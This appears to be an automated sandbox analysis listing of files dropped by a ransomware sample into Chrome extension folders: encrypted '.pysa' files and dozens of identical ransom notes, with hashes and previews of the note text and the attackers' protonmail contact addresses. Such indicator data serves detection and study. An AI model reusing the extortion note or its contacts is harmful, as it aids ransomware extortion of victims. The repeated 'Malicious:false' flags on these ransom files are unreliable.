                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\zh_CN\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\zh_TW\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.163424926371964
                  Encrypted:false
                  SSDEEP:96:xNFW0bbiTMBp60ZFS+eCQc2HHzoNaVhl34yeFaa8+h4gAX3n:zHfiY/xVeCQc6H2aVhlIAHR
                  MD5:B427CE4385288CDC9934CA1628E470E6
                  SHA1:46925C856186974D12A4FE4E0D4688EEEA8F6389
                  SHA-256:973888D79DECD82A6CF14959CBDCFE2D6D1DC5360A3C329C7E953A1BD8121C4F
                  SHA-512:A7742C727ADCF58FF704E06CF016FFF8E6AA39FC8A2EF600B9DB4A60BF47466C056D633DCA72433863D1EAFD25E7C6DC1D60AF6FCEC31162B30853220BA56337
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.3714453864737814
                  Encrypted:false
                  SSDEEP:96:PWzAeHcrB8TD81ZvgFl3n8YEQKv34tPvmxu00NIG86GiiGySSK:PTUcNkcAl3nS/M3mguXbDK
                  MD5:2EE9A6FBEFDEBDB5F2A7541C30EB5BCC
                  SHA1:9E6C2823C7609F5D338380704A8829B55E7D4E2D
                  SHA-256:167867951A623B6EDF0A5F5C385CECA60ED847715C74AD24A902E93E1C438448
                  SHA-512:3F7CDA0E0E7960B8908815EAD01BCD83FE917D9929A55F90A4C423AA98C8BBA7404067C8D874D4BFCB0F64BBCE2763D50478048DF7854C0D7F9B952C24856086
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\af\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\am\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ar\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\az\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\be\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\bg\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\bn\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ca\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\cs\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\cy\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\da\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\de\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\el\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\en\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\es\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\et\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\eu\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fa\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fi\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fil\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fr\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\gl\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\gu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\hy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\is\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\iw\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ka\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\kk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\km\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\kn\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lo\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ml\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\mn\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\mr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\my\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ne\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
